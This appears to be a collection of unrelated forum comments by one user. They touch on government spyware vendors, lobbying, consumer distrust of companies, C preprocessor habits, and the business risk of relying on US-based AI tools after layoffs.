if anyone does it sneakily, there is alleged wrongdoing attached to it. I can imagine multiple scenarios like some well-known Israeli company "selling their software only to governments", paying quite amount of money for it, because they were unable to break this one.

I'd say this shows how corrupted elites are. If the "democratic" entity spends all the time with lobbyists, and not the initiative which started the discussion, this speaks volumes.

This is defence mechanism I guess.

People were screwed so many times by so many companies, they have been taught the hard way to behave like that: either make a lot of noise and hate in the first stage, or just agree that some functionality has been removed to milk more money etc.

I did this in my C project 7 years ago, as this is standard in C and gave a lot of readability, in fact more I guess... but a lot of preprocessor code too

With the due respect of any political beliefs here, in the course of politics any country can be deemed the US enemy (or any other country's enemy as a matter of fact), so for example firing the 3/4 of the company because we have Claude and ChatGPT (US based) is a major business continuation flaw...
